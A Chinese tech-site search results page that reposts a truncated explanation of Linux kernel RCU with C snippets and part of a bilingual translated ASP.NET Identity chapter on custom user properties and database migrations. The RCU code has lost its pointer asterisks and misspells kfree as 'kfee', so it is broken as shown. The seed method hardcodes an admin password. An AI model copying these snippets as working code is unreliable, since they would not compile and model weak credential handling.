前端技术
HTML
CSS
Javascript
前端框架和UI库
VUE
ReactJS
AngularJS
JQuery
NodeJS
JSON
Element-UI
Bootstrap
Material UI
服务端和客户端
Java
Python
PHP
Golang
Scala
Kotlin
Groovy
Ruby
Lua
.net
c#
c++
后端WEB和工程框架
SpringBoot
SpringCloud
Struts2
MyBatis
Hibernate
Tornado
Beego
Go-Spring
Go Gin
Go Iris
Dubbo
HessianRPC
Maven
Gradle
数据库
MySQL
Oracle
Mongo
中间件与web容器
Redis
MemCache
Etcd
Cassandra
Kafka
RabbitMQ
RocketMQ
ActiveMQ
Nacos
Consul
Tomcat
Nginx
Netty
大数据技术
Hive
Impala
ClickHouse
DorisDB
Greenplum
PostgreSQL
HBase
Kylin
Hadoop
Apache Pig
ZooKeeper
SeaTunnel
Sqoop
Datax
Flink
Spark
Mahout
数据搜索与日志
ElasticSearch
Apache Lucene
Apache Solr
Kibana
Logstash
数据可视化与OLAP
Apache Atlas
Superset
Saiku
Tesseract
系统与容器
Linux
Shell
Docker
Kubernetes
[RCU Read-Copy Update...]的搜索结果
这里是文章列表。热门标签的颜色随机变换,标签颜色没有特殊含义。
点击某个标签可搜索标签相关的文章。
点击某个标签可搜索标签相关的文章。
转载文章
...实并删除相应内容。 RCU(Read-Copy Update)是数据同步的一种方式,在当前的Linux内核中发挥着重要的作用。RCU主要针对的数据对象是链表,目的是提高遍历读取数据的效率,为了达到目的使用RCU机制读取数据的时候不对链表进行耗时的加锁操作。这样在同一时间可以有多个线程同时读取该链表,并且允许一个线程对链表进行修改(修改的时候,需要加锁)。RCU适用于需要频繁的读取数据,而相应修改数据并不多的情景,例如在文件系统中,经常需要查找定位目录,而对目录的修改相对来说并不多,这就是RCU发挥作用的最佳场景。 Linux内核源码当中,关于RCU的文档比较齐全,你可以在 /DocumentaTIon/RCU/ 目录下找到这些文件。Paul E. McKenney 是内核中RCU源码的主要实现者,他也写了很多RCU方面的文章。今天我们就主要来说说linux内核rcu的机制详解。 在RCU的实现过程中,我们主要解决以下问题: 在读取过程中,另外一个线程删除了一个节点。删除线程可以把这个节点从链表中移除,但它不能直接销毁这个节点,必须等到所有的线程读取完成以后,才进行销毁操作。RCU中把这个过程称为宽限期(Grace period)。 在读取过程中,另外一个线程插入了一个新节点,而读线程读到了这个节点,那么需要保证读到的这个节点是完整的。这里涉及到了发布-订阅机制(Publish-Subscribe Mechanism)。 保证读取链表的完整性。新增或者删除一个节点,不至于导致遍历一个链表从中间断开。但是RCU并不保证一定能读到新增的节点或者不读到要被删除的节点。 宽限期 通过这个例子,方便理解这个内容。以下例子修改于Paul的文章。 struct foo {int a;char b;long c;};DEFINE_SPINLOCK(foo_mutex);struct foo gbl_foo;void foo_read (void){foo fp = gbl_foo;if ( fp != NULL )dosomething(fp-》a, fp-》b , fp-》c );}void foo_update( foo new_fp ){spin_lock(&foo_mutex);foo old_fp = gbl_foo;gbl_foo = new_fp;spin_unlock(&foo_mutex);kfee(old_fp);} 如上的程序,是针对于全局变量gbl_foo的操作。假设以下场景。有两个线程同时运行 foo_ read和foo_update的时候,当foo_ read执行完赋值操作后,线程发生切换;此时另一个线程开始执行foo_update并执行完成。当foo_ read运行的进程切换回来后,运行dosomething 的时候,fp已经被删除,这将对系统造成危害。为了防止此类事件的发生,RCU里增加了一个新的概念叫宽限期(Grace period)。 如下图所示: 图中每行代表一个线程,最下面的一行是删除线程,当它执行完删除操作后,线程进入了宽限期。宽限期的意义是,在一个删除动作发生后,它必须等待所有在宽限期开始前已经开始的读线程结束,才可以进行销毁操作。这样做的原因是这些线程有可能读到了要删除的元素。图中的宽限期必须等待1和2结束;而读线程5在宽限期开始前已经结束,不需要考虑;而3,4,6也不需要考虑,因为在宽限期结束后开始后的线程不可能读到已删除的元素。为此RCU机制提供了相应的API来实现这个功能。 void foo_read(void){rcu_read_lock();foo fp = gbl_foo;if ( fp != NULL )dosomething(fp-》a,fp-》b,fp-》c);rcu_read_unlock();}void foo_update( foo new_fp ){spin_lock(&foo_mutex);foo old_fp = gbl_foo;gbl_foo = new_fp;spin_unlock(&foo_mutex);synchronize_rcu();kfee(old_fp);} 其中foo_read中增加了rcu_read_lock和rcu_read_unlock,这两个函数用来标记一个RCU读过程的开始和结束。其实作用就是帮助检测宽限期是否结束。 foo_update增加了一个函数synchronize_rcu(),调用该函数意味着一个宽限期的开始,而直到宽限期结束,该函数才会返回。我们再对比着图看一看,线程1和2,在synchronize_rcu之前可能得到了旧的gbl_foo,也就是foo_update中的old_fp,如果不等它们运行结束,就调用kfee(old_fp),极有可能造成系统崩溃。而3,4,6在synchronize_rcu之后运行,此时它们已经不可能得到old_fp,此次的kfee将不对它们产生影响。 宽限期是RCU实现中最复杂的部分,原因是在提高读数据性能的同时,删除数据的性能也不能太差。 订阅——发布机制 当前使用的编译器大多会对代码做一定程度的优化,CPU也会对执行指令做一些优化调整,目的是提高代码的执行效率,但这样的优化,有时候会带来不期望的结果。如例: void foo_update( foo new_fp ){spin_lock(&foo_mutex);foo old_fp = gbl_foo;new_fp-》a = 1;new_fp-》b = ‘b’;new_fp-》c = 100;gbl_foo = new_fp;spin_unlock(&foo_mutex);synchronize_rcu();kfee(old_fp);} 这段代码中,我们期望的是6,7,8行的代码在第10行代码之前执行。但优化后的代码并不会对执行顺序做出保证。在这种情形下,一个读线程很可能读到 new_fp,但new_fp的成员赋值还没执行完成。单独线程执行dosomething(fp-》a, fp-》b , fp-》c ) 的 这个时候,就有不确定的参数传入到dosomething,极有可能造成不期望的结果,甚至程序崩溃。可以通过优化屏障来解决该问题,RCU机制对优化屏障做了包装,提供了专用的API来解决该问题。这时候,第十行不再是直接的指针赋值,而应该改为 : rcu_assign_pointer(gbl_foo,new_fp);rcu_assign_pointer的实现比较简单,如下:define rcu_assign_pointer(p, v) \__rcu_assign_pointer((p), (v), __rcu)define __rcu_assign_pointer(p, v, space) \do { \smp_wmb(); \(p) = (typeof(v) __force space )(v); \} while (0) 我们可以看到它的实现只是在赋值之前加了优化屏障 smp_wmb来确保代码的执行顺序。另外就是宏中用到的__rcu,只是作为编译过程的检测条件来使用的。 在DEC Alpha CPU机器上还有一种更强悍的优化,如下所示: void foo_read(void){rcu_read_lock();foo fp = gbl_foo;if ( fp != NULL )dosomething(fp-》a, fp-》b ,fp-》c);rcu_read_unlock();} 第六行的 fp-》a,fp-》b,fp-》c会在第3行还没执行的时候就预先判断运行,当他和foo_update同时运行的时候,可能导致传入dosomething的一部分属于旧的gbl_foo,而另外的属于新的。这样会导致运行结果的错误。为了避免该类问题,RCU还是提供了宏来解决该问题: define rcu_dereference(p) rcu_dereference_check(p, 0)define rcu_dereference_check(p, c) \__rcu_dereference_check((p), rcu_read_lock_held() || (c), __rcu)define __rcu_dereference_check(p, c, space) \({ \typeof(p) _________p1 = (typeof(p)__force )ACCESS_ONCE(p); \rcu_lockdep_assert(c, “suspicious rcu_dereference_check()” \usage”); \rcu_dereference_sparse(p, space); \smp_read_barrier_depends(); \(typeof(p) __force __kernel )(_________p1)); \})staTIc inline int rcu_read_lock_held(void){if (!debug_lockdep_rcu_enabled())return 1;if (rcu_is_cpu_idle())return 0;if (!rcu_lockdep_current_cpu_online())return 0;return lock_is_held(&rcu_lock_map);} 这段代码中加入了调试信息,去除调试信息,可以是以下的形式(其实这也是旧版本中的代码): define rcu_dereference(p) ({ \typeof(p) _________p1 = p; \smp_read_barrier_depends(); \(_________p1); \}) 在赋值后加入优化屏障smp_read_barrier_depends()。我们之前的第四行代码改为 foo fp = rcu_dereference(gbl_foo);,就可以防止上述问题。 数据读取的完整性 还是通过例子来说明这个问题: 如图我们在原list中加入一个节点new到A之前,所要做的第一步是将new的指针指向A节点,第二步才是将Head的指针指向new。这样做的目的是当插入操作完成第一步的时候,对于链表的读取并不产生影响,而执行完第二步的时候,读线程如果读到new节点,也可以继续遍历链表。如果把这个过程反过来,第一步head指向new,而这时一个线程读到new,由于new的指针指向的是Null,这样将导致读线程无法读取到A,B等后续节点。从以上过程中,可以看出RCU并不保证读线程读取到new节点。如果该节点对程序产生影响,那么就需要外部调用来做相应的调整。如在文件系统中,通过RCU定位后,如果查找不到相应节点,就会进行其它形式的查找,相关内容等分析到文件系统的时候再进行叙述。 我们再看一下删除一个节点的例子: 如图我们希望删除B,这时候要做的就是将A的指针指向C,保持B的指针,然后删除程序将进入宽限期检测。由于B的内容并没有变更,读到B的线程仍然可以继续读取B的后续节点。B不能立即销毁,它必须等待宽限期结束后,才能进行相应销毁操作。由于A的节点已经指向了C,当宽限期开始之后所有的后续读操作通过A找到的是C,而B已经隐藏了,后续的读线程都不会读到它。这样就确保宽限期过后,删除B并不对系统造成影响。 小结 RCU的原理并不复杂,应用也很简单。但代码的实现确并不是那么容易,难点都集中在了宽限期的检测上,后续分析源代码的时候,我们可以看到一些极富技巧的实现方式。 本篇文章为转载内容。原文链接:https://blog.csdn.net/m0_50662680/article/details/128449401。 该文由互联网用户投稿提供,文中观点代表作者本人意见,并不代表本站的立场。 作为信息平台,本站仅提供文章转载服务,并不拥有其所有权,也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况,请及时联系我们,我们将第一时间进行核实并删除相应内容。
2023-09-25 09:31:10
105
转载
转载文章
...1–3, 8–11 Update the database schema without deleting user data. 更新数据库架构而不删除用户数据 Perform a database migration. 执行数据库迁移 4–7 Perform fine-grained authorization. 执行细粒度授权 Use claims. 使用声明(Claims) 12–14 Add claims about a user. 添加用户的声明(Claims) Use the ClaimsIdentity.AddClaims method. 使用ClaimsIdentity.AddClaims方法 15–19 Authorize access based on claim values. 基于声明(Claims)值授权访问 Create a custom authorization filter attribute. 创建一个自定义的授权过滤器注解属性 20–21 Authenticate through a third party. 通过第三方认证 Install the NuGet package for the authentication provider, redirect requests to that provider, and specify a callback URL that creates the user account. 安装认证提供器的NuGet包,将请求重定向到该提供器,并指定一个创建用户账号的回调URL。 22–25 15.1 Preparing the Example Project 15.1 准备示例项目 In this chapter, I am going to continue working on the Users project I created in Chapter 13 and enhanced in Chapter 14. No changes to the application are required, but start the application and make sure that there are users in the database. Figure 15-1 shows the state of my database, which contains the users Admin, Alice, Bob, and Joe from the previous chapter. To check the users, start the application and request the /Admin/Index URL and authenticate as the Admin user. 本章打算继续使用第13章创建并在第14章增强的Users项目。对应用程序无需做什么改变,但需要启动应用程序,并确保数据库中有一些用户。图15-1显示了数据库的状态,它含有上一章的用户Admin、Alice、Bob以及Joe。为了检查用户,请启动应用程序,请求/Admin/Index URL,并以Admin用户进行认证。 Figure 15-1. The initial users in the Identity database 图15-1. Identity数据库中的最初用户 I also need some roles for this chapter. I used the RoleAdmin controller to create roles called Users and Employees and assigned the users to those roles, as described in Table 15-2. 本章还需要一些角色。我用RoleAdmin控制器创建了角色Users和Employees,并为这些角色指定了一些用户,如表15-2所示。 Table 15-2. The Types of Web Forms Code Nuggets 表15-2. 角色及成员(作者将此表的标题写错了——译者注) Role 角色 Members 成员 Users Alice, Joe Employees Alice, Bob Figure 15-2 shows the required role configuration displayed by the RoleAdmin controller. 图15-2显示了由RoleAdmin控制器所显示出来的必要的角色配置。 Figure 15-2. Configuring the roles required for this chapter 图15-2. 配置本章所需的角色 15.2 Adding Custom User Properties 15.2 添加自定义用户属性 When I created the AppUser class to represent users in Chapter 13, I noted that the base class defined a basic set of properties to describe the user, such as e-mail address and telephone number. Most applications need to store more information about users, including persistent application preferences and details such as addresses—in short, any data that is useful to running the application and that should last between sessions. In ASP.NET Membership, this was handled through the user profile system, but ASP.NET Identity takes a different approach. 我在第13章创建AppUser类来表示用户时曾做过说明,基类定义了一组描述用户的基本属性,如E-mail地址、电话号码等。大多数应用程序还需要存储用户的更多信息,包括持久化应用程序爱好以及地址等细节——简言之,需要存储对运行应用程序有用并且在各次会话之间应当保持的任何数据。在ASP.NET Membership中,这是通过用户资料(User Profile)系统来处理的,但ASP.NET Identity采取了一种不同的办法。 Because the ASP.NET Identity system uses Entity Framework to store its data by default, defining additional user information is just a matter of adding properties to the user class and letting the Code First feature create the database schema required to store them. Table 15-3 puts custom user properties in context. 因为ASP.NET Identity默认是使用Entity Framework来存储其数据的,定义附加的用户信息只不过是给用户类添加属性的事情,然后让Code First特性去创建需要存储它们的数据库架构即可。表15-3描述了自定义用户属性的情形。 Table 15-3. Putting Cusotm User Properties in Context 表15-3. 自定义用户属性的情形 Question 问题 Answer 回答 What is it? 什么是自定义用户属性? Custom user properties allow you to store additional information about your users, including their preferences and settings. 自定义用户属性让你能够存储附加的用户信息,包括他们的爱好和设置。 Why should I care? 为何要关心它? A persistent store of settings means that the user doesn’t have to provide the same information each time they log in to the application. 设置的持久化存储意味着,用户不必每次登录到应用程序时都提供同样的信息。 How is it used by the MVC framework? 在MVC框架中如何使用它? This feature isn’t used directly by the MVC framework, but it is available for use in action methods. 此特性不是由MVC框架直接使用的,但它在动作方法中使用是有效的。 15.2.1 Defining Custom Properties 15.2.1 定义自定义属性 Listing 15-1 shows how I added a simple property to the AppUser class to represent the city in which the user lives. 清单15-1演示了如何给AppUser类添加一个简单的属性,用以表示用户生活的城市。 Listing 15-1. Adding a Property in the AppUser.cs File 清单15-1. 在AppUser.cs文件中添加属性 using System;using Microsoft.AspNet.Identity.EntityFramework;namespace Users.Models { public enum Cities {LONDON, PARIS, CHICAGO}public class AppUser : IdentityUser {public Cities City { get; set; } }} I have defined an enumeration called Cities that defines values for some large cities and added a property called City to the AppUser class. To allow the user to view and edit their City property, I added actions to the Home controller, as shown in Listing 15-2. 这里定义了一个枚举,名称为Cities,它定义了一些大城市的值,另外给AppUser类添加了一个名称为City的属性。为了让用户能够查看和编辑City属性,给Home控制器添加了几个动作方法,如清单15-2所示。 Listing 15-2. Adding Support for Custom User Properties in the HomeController.cs File 清单15-2. 在HomeController.cs文件中添加对自定义属性的支持 using System.Web.Mvc;using System.Collections.Generic;using System.Web;using System.Security.Principal;using System.Threading.Tasks;using Users.Infrastructure;using Microsoft.AspNet.Identity;using Microsoft.AspNet.Identity.Owin;using Users.Models;namespace Users.Controllers {public class HomeController : Controller {[Authorize]public ActionResult Index() {return View(GetData("Index"));}[Authorize(Roles = "Users")]public ActionResult OtherAction() {return View("Index", GetData("OtherAction"));}private Dictionary<string, object> GetData(string actionName) {Dictionary<string, object> dict= new Dictionary<string, object>();dict.Add("Action", actionName);dict.Add("User", HttpContext.User.Identity.Name);dict.Add("Authenticated", HttpContext.User.Identity.IsAuthenticated);dict.Add("Auth Type", HttpContext.User.Identity.AuthenticationType);dict.Add("In Users Role", HttpContext.User.IsInRole("Users"));return dict;} [Authorize]public ActionResult UserProps() {return View(CurrentUser);}[Authorize][HttpPost]public async Task<ActionResult> UserProps(Cities city) {AppUser user = CurrentUser;user.City = city;await UserManager.UpdateAsync(user);return View(user);}private AppUser CurrentUser {get {return UserManager.FindByName(HttpContext.User.Identity.Name);} }private AppUserManager UserManager {get {return HttpContext.GetOwinContext().GetUserManager<AppUserManager>();} }} } I added a CurrentUser property that uses the AppUserManager class to retrieve an AppUser instance to represent the current user. I pass the AppUser object as the view model object in the GET version of the UserProps action method, and the POST method uses it to update the value of the new City property. Listing 15-3 shows the UserProps.cshtml view, which displays the City property value and contains a form to change it. 我添加了一个CurrentUser属性,它使用AppUserManager类接收了表示当前用户的AppUser实例。在GET版本的UserProps动作方法中,传递了这个AppUser对象作为视图模型。而在POST版的方法中用它更新了City属性的值。清单15-3显示了UserProps.cshtml视图,它显示了City属性的值,并包含一个修改它的表单。 Listing 15-3. The Contents of the UserProps.cshtml File in the Views/Home Folder 清单15-3. Views/Home文件夹中UserProps.cshtml文件的内容 @using Users.Models@model AppUser@{ ViewBag.Title = "UserProps";}<div class="panel panel-primary"><div class="panel-heading">Custom User Properties</div><table class="table table-striped"><tr><th>City</th><td>@Model.City</td></tr></table></div> @using (Html.BeginForm()) {<div class="form-group"><label>City</label>@Html.DropDownListFor(x => x.City, new SelectList(Enum.GetNames(typeof(Cities))))</div><button class="btn btn-primary" type="submit">Save</button>} Caution Don’t start the application when you have created the view. In the sections that follow, I demonstrate how to preserve the contents of the database, and if you start the application now, the ASP.NET Identity users will be deleted. 警告:创建了视图之后不要启动应用程序。在以下小节中,将演示如何保留数据库的内容,如果现在启动应用程序,将会删除ASP.NET Identity的用户。 15.2.2 Preparing for Database Migration 15.2.2 准备数据库迁移 The default behavior for the Entity Framework Code First feature is to drop the tables in the database and re-create them whenever classes that drive the schema have changed. You saw this in Chapter 14 when I added support for roles: When the application was started, the database was reset, and the user accounts were lost. Entity Framework Code First特性的默认行为是,一旦修改了派生数据库架构的类,便会删除数据库中的数据表,并重新创建它们。在第14章可以看到这种情况,在我添加角色支持时:当重启应用程序后,数据库被重置,用户账号也丢失。 Don’t start the application yet, but if you were to do so, you would see a similar effect. Deleting data during development is usually not a problem, but doing so in a production setting is usually disastrous because it deletes all of the real user accounts and causes a panic while the backups are restored. In this section, I am going to demonstrate how to use the database migration feature, which updates a Code First schema in a less brutal manner and preserves the existing data it contains. 不要启动应用程序,但如果你这么做了,会看到类似的效果。在开发期间删除数据没什么问题,但如果在产品设置中这么做了,通常是灾难性的,因为它会删除所有真实的用户账号,而备份恢复是很痛苦的事。在本小节中,我打算演示如何使用数据库迁移特性,它能以比较温和的方式更新Code First的架构,并保留架构中的已有数据。 The first step is to issue the following command in the Visual Studio Package Manager Console: 第一个步骤是在Visual Studio的“Package Manager Console(包管理器控制台)”中发布以下命令: Enable-Migrations –EnableAutomaticMigrations This enables the database migration support and creates a Migrations folder in the Solution Explorer that contains a Configuration.cs class file, the contents of which are shown in Listing 15-4. 它启用了数据库的迁移支持,并在“Solution Explorer(解决方案资源管理器)”创建一个Migrations文件夹,其中含有一个Configuration.cs类文件,内容如清单15-4所示。 Listing 15-4. The Contents of the Configuration.cs File 清单15-4. Configuration.cs文件的内容 namespace Users.Migrations {using System;using System.Data.Entity;using System.Data.Entity.Migrations;using System.Linq;internal sealed class Configuration: DbMigrationsConfiguration<Users.Infrastructure.AppIdentityDbContext> {public Configuration() {AutomaticMigrationsEnabled = true;ContextKey = "Users.Infrastructure.AppIdentityDbContext";}protected override void Seed(Users.Infrastructure.AppIdentityDbContext context) {// This method will be called after migrating to the latest version.// 此方法将在迁移到最新版本时调用// You can use the DbSet<T>.AddOrUpdate() helper extension method// to avoid creating duplicate seed data. E.g.// 例如,你可以使用DbSet<T>.AddOrUpdate()辅助器方法来避免创建重复的种子数据//// context.People.AddOrUpdate(// p => p.FullName,// new Person { FullName = "Andrew Peters" },// new Person { FullName = "Brice Lambson" },// new Person { FullName = "Rowan Miller" }// );//} }} Tip You might be wondering why you are entering a database migration command into the console used to manage NuGet packages. The answer is that the Package Manager Console is really PowerShell, which is a general-purpose tool that is mislabeled by Visual Studio. You can use the console to issue a wide range of helpful commands. See http://go.microsoft.com/fwlink/?LinkID=108518 for details. 提示:你可能会觉得奇怪,为什么要在管理NuGet包的控制台中输入数据库迁移的命令?答案是“Package Manager Console(包管理控制台)”是真正的PowerShell,这是Visual studio冒用的一个通用工具。你可以使用此控制台发送大量的有用命令,详见http://go.microsoft.com/fwlink/?LinkID=108518。 The class will be used to migrate existing content in the database to the new schema, and the Seed method will be called to provide an opportunity to update the existing database records. In Listing 15-5, you can see how I have used the Seed method to set a default value for the new City property I added to the AppUser class. (I have also updated the class file to reflect my usual coding style.) 这个类将用于把数据库中的现有内容迁移到新的数据库架构,Seed方法的调用为更新现有数据库记录提供了机会。在清单15-5中可以看到,我如何用Seed方法为新的City属性设置默认值,City是添加到AppUser类中自定义属性。(为了体现我一贯的编码风格,我对这个类文件也进行了更新。) Listing 15-5. Managing Existing Content in the Configuration.cs File 清单15-5. 在Configuration.cs文件中管理已有内容 using System.Data.Entity.Migrations;using Microsoft.AspNet.Identity;using Microsoft.AspNet.Identity.EntityFramework;using Users.Infrastructure;using Users.Models;namespace Users.Migrations {internal sealed class Configuration: DbMigrationsConfiguration<AppIdentityDbContext> {public Configuration() {AutomaticMigrationsEnabled = true;ContextKey = "Users.Infrastructure.AppIdentityDbContext";}protected override void Seed(AppIdentityDbContext context) {AppUserManager userMgr = new AppUserManager(new UserStore<AppUser>(context));AppRoleManager roleMgr = new AppRoleManager(new RoleStore<AppRole>(context)); string roleName = "Administrators";string userName = "Admin";string password = "MySecret";string email = "admin@example.com";if (!roleMgr.RoleExists(roleName)) {roleMgr.Create(new AppRole(roleName));}AppUser user = userMgr.FindByName(userName);if (user == null) {userMgr.Create(new AppUser { UserName = userName, Email = email },password);user = userMgr.FindByName(userName);}if (!userMgr.IsInRole(user.Id, roleName)) {userMgr.AddToRole(user.Id, roleName);}foreach (AppUser dbUser in userMgr.Users) {dbUser.City = Cities.PARIS;}context.SaveChanges();} }} You will notice that much of the code that I added to the Seed method is taken from the IdentityDbInit class, which I used to seed the database with an administration user in Chapter 14. This is because the new Configuration class added to support database migrations will replace the seeding function of the IdentityDbInit class, which I’ll update shortly. Aside from ensuring that there is an admin user, the statements in the Seed method that are important are the ones that set the initial value for the City property I added to the AppUser class, as follows: 你可能会注意到,添加到Seed方法中的许多代码取自于IdentityDbInit类,在第14章中我用这个类将管理用户植入了数据库。这是因为这个新添加的、用以支持数据库迁移的Configuration类,将代替IdentityDbInit类的种植功能,我很快便会更新这个类。除了要确保有admin用户之外,在Seed方法中的重要语句是那些为AppUser类的City属性设置初值的语句,如下所示: ...foreach (AppUser dbUser in userMgr.Users) { dbUser.City = Cities.PARIS;}context.SaveChanges();... You don’t have to set a default value for new properties—I just wanted to demonstrate that the Seed method in the Configuration class can be used to update the existing user records in the database. 你不一定要为新属性设置默认值——这里只是想演示Configuration类中的Seed方法,可以用它更新数据库中的已有用户记录。 Caution Be careful when setting values for properties in the Seed method for real projects because the values will be applied every time you change the schema, overriding any values that the user has set since the last schema update was performed. I set the value of the City property just to demonstrate that it can be done. 警告:在用于真实项目的Seed方法中为属性设置值时要小心,因为你每一次修改架构时,都会运用这些值,这会将自执行上一次架构更新之后,用户设置的任何数据覆盖掉。这里设置City属性的值只是为了演示它能够这么做。 Changing the Database Context Class 修改数据库上下文类 The reason that I added the seeding code to the Configuration class is that I need to change the IdentityDbInit class. At present, the IdentityDbInit class is derived from the descriptively named DropCreateDatabaseIfModelChanges<AppIdentityDbContext> class, which, as you might imagine, drops the entire database when the Code First classes change. Listing 15-6 shows the changes I made to the IdentityDbInit class to prevent it from affecting the database. 在Configuration类中添加种植代码的原因是我需要修改IdentityDbInit类。此时,IdentityDbInit类派生于描述性命名的DropCreateDatabaseIfModelChanges<AppIdentityDbContext> 类,和你相像的一样,它会在Code First类改变时删除整个数据库。清单15-6显示了我对IdentityDbInit类所做的修改,以防止它影响数据库。 Listing 15-6. Preventing Database Schema Changes in the AppIdentityDbContext.cs File 清单15-6. 在AppIdentityDbContext.cs文件是阻止数据库架构变化 using System.Data.Entity;using Microsoft.AspNet.Identity.EntityFramework;using Users.Models;using Microsoft.AspNet.Identity; namespace Users.Infrastructure {public class AppIdentityDbContext : IdentityDbContext<AppUser> {public AppIdentityDbContext() : base("IdentityDb") { }static AppIdentityDbContext() {Database.SetInitializer<AppIdentityDbContext>(new IdentityDbInit());}public static AppIdentityDbContext Create() {return new AppIdentityDbContext();} } public class IdentityDbInit : NullDatabaseInitializer<AppIdentityDbContext> {} } I have removed the methods defined by the class and changed its base to NullDatabaseInitializer<AppIdentityDbContext> , which prevents the schema from being altered. 我删除了这个类中所定义的方法,并将它的基类改为NullDatabaseInitializer<AppIdentityDbContext> ,它可以防止架构修改。 15.2.3 Performing the Migration 15.2.3 执行迁移 All that remains is to generate and apply the migration. First, run the following command in the Package Manager Console: 剩下的事情只是生成并运用迁移了。首先,在“Package Manager Console(包管理器控制台)”中执行以下命令: Add-Migration CityProperty This creates a new migration called CityProperty (I like my migration names to reflect the changes I made). A class new file will be added to the Migrations folder, and its name reflects the time at which the command was run and the name of the migration. My file is called 201402262244036_CityProperty.cs, for example. The contents of this file contain the details of how Entity Framework will change the database during the migration, as shown in Listing 15-7. 这创建了一个名称为CityProperty的新迁移(我比较喜欢让迁移的名称反映出我所做的修改)。这会在文件夹中添加一个新的类文件,而且其命名会反映出该命令执行的时间以及迁移名称,例如,我的这个文件名称为201402262244036_CityProperty.cs。该文件的内容含有迁移期间Entity Framework修改数据库的细节,如清单15-7所示。 Listing 15-7. The Contents of the 201402262244036_CityProperty.cs File 清单15-7. 201402262244036_CityProperty.cs文件的内容 namespace Users.Migrations {using System;using System.Data.Entity.Migrations; public partial class Init : DbMigration {public override void Up() {AddColumn("dbo.AspNetUsers", "City", c => c.Int(nullable: false));}public override void Down() {DropColumn("dbo.AspNetUsers", "City");} }} The Up method describes the changes that have to be made to the schema when the database is upgraded, which in this case means adding a City column to the AspNetUsers table, which is the one that is used to store user records in the ASP.NET Identity database. Up方法描述了在数据库升级时,需要对架构所做的修改,在这个例子中,意味着要在AspNetUsers数据表中添加City数据列,该数据表是ASP.NET Identity数据库用来存储用户记录的。 The final step is to perform the migration. Without starting the application, run the following command in the Package Manager Console: 最后一步是执行迁移。无需启动应用程序,只需在“Package Manager Console(包管理器控制台)”中运行以下命令即可: Update-Database –TargetMigration CityProperty The database schema will be modified, and the code in the Configuration.Seed method will be executed. The existing user accounts will have been preserved and enhanced with a City property (which I set to Paris in the Seed method). 这会修改数据库架构,并执行Configuration.Seed方法中的代码。已有用户账号会被保留,且增强了City属性(我在Seed方法中已将其设置为“Paris”)。 15.2.4 Testing the Migration 15.2.4 测试迁移 To test the effect of the migration, start the application, navigate to the /Home/UserProps URL, and authenticate as one of the Identity users (for example, as Alice with the password MySecret). Once authenticated, you will see the current value of the City property for the user and have the opportunity to change it, as shown in Figure 15-3. 为了测试迁移的效果,启动应用程序,导航到/Home/UserProps URL,并以Identity中的用户(例如Alice,口令MySecret)进行认证。一旦已被认证,便会看到该用户City属性的当前值,并可以对其进行修改,如图15-3所示。 Figure 15-3. Displaying and changing a custom user property 图15-3. 显示和个性自定义用户属性 15.2.5 Defining an Additional Property 15.2.5 定义附加属性 Now that database migrations are set up, I am going to define a further property just to demonstrate how subsequent changes are handled and to show a more useful (and less dangerous) example of using the Configuration.Seed method. Listing 15-8 shows how I added a Country property to the AppUser class. 现在,已经建立了数据库迁移,我打算再定义一个属性,这恰恰演示了如何处理持续不断的修改,也为了演示Configuration.Seed方法更有用(至少无害)的示例。清单15-8显示了我在AppUser类上添加了一个Country属性。 Listing 15-8. Adding Another Property in the AppUserModels.cs File 清单15-8. 在AppUserModels.cs文件中添加另一个属性 using System;using Microsoft.AspNet.Identity.EntityFramework; namespace Users.Models {public enum Cities {LONDON, PARIS, CHICAGO} public enum Countries {NONE, UK, FRANCE, USA}public class AppUser : IdentityUser {public Cities City { get; set; }public Countries Country { get; set; }public void SetCountryFromCity(Cities city) {switch (city) {case Cities.LONDON:Country = Countries.UK;break;case Cities.PARIS:Country = Countries.FRANCE;break;case Cities.CHICAGO:Country = Countries.USA;break;default:Country = Countries.NONE;break;} }} } I have added an enumeration to define the country names and a helper method that selects a country value based on the City property. Listing 15-9 shows the change I made to the Configuration class so that the Seed method sets the Country property based on the City, but only if the value of Country is NONE (which it will be for all users when the database is migrated because the Entity Framework sets enumeration columns to the first value). 我已经添加了一个枚举,它定义了国家名称。还添加了一个辅助器方法,它可以根据City属性选择一个国家。清单15-9显示了对Configuration类所做的修改,以使Seed方法根据City设置Country属性,但只当Country为NONE时才进行设置(在迁移数据库时,所有用户都是NONE,因为Entity Framework会将枚举列设置为枚举的第一个值)。 Listing 15-9. Modifying the Database Seed in the Configuration.cs File 清单15-9. 在Configuration.cs文件中修改数据库种子 using System.Data.Entity.Migrations;using Microsoft.AspNet.Identity;using Microsoft.AspNet.Identity.EntityFramework;using Users.Infrastructure;using Users.Models; namespace Users.Migrations {internal sealed class Configuration: DbMigrationsConfiguration<AppIdentityDbContext> {public Configuration() {AutomaticMigrationsEnabled = true;ContextKey = "Users.Infrastructure.AppIdentityDbContext";}protected override void Seed(AppIdentityDbContext context) {AppUserManager userMgr = new AppUserManager(new UserStore<AppUser>(context));AppRoleManager roleMgr = new AppRoleManager(new RoleStore<AppRole>(context)); string roleName = "Administrators";string userName = "Admin";string password = "MySecret";string email = "admin@example.com";if (!roleMgr.RoleExists(roleName)) {roleMgr.Create(new AppRole(roleName));}AppUser user = userMgr.FindByName(userName);if (user == null) {userMgr.Create(new AppUser { UserName = userName, Email = email },password);user = userMgr.FindByName(userName);}if (!userMgr.IsInRole(user.Id, roleName)) {userMgr.AddToRole(user.Id, roleName);} foreach (AppUser dbUser in userMgr.Users) {if (dbUser.Country == Countries.NONE) {dbUser.SetCountryFromCity(dbUser.City);} }context.SaveChanges();} }} This kind of seeding is more useful in a real project because it will set a value for the Country property only if one has not already been set—subsequent migrations won’t be affected, and user selections won’t be lost. 这种种植在实际项目中会更有用,因为它只会在Country属性未设置时,才会设置Country属性的值——后继的迁移不会受到影响,因此不会失去用户的选择。 1. Adding Application Support 1. 添加应用程序支持 There is no point defining additional user properties if they are not available in the application, so Listing 15-10 shows the change I made to the Views/Home/UserProps.cshtml file to display the value of the Country property. 应用程序中如果没有定义附加属性的地方,则附加属性就无法使用了,因此,清单15-10显示了我对Views/Home/UserProps.cshtml文件的修改,以显示Country属性的值。 Listing 15-10. Displaying an Additional Property in the UserProps.cshtml File 清单15-10. 在UserProps.cshtml文件中显示附加属性 @using Users.Models@model AppUser@{ ViewBag.Title = "UserProps";} <div class="panel panel-primary"><div class="panel-heading">Custom User Properties</div><table class="table table-striped"><tr><th>City</th><td>@Model.City</td></tr> <tr><th>Country</th><td>@Model.Country</td></tr></table></div>@using (Html.BeginForm()) {<div class="form-group"><label>City</label>@Html.DropDownListFor(x => 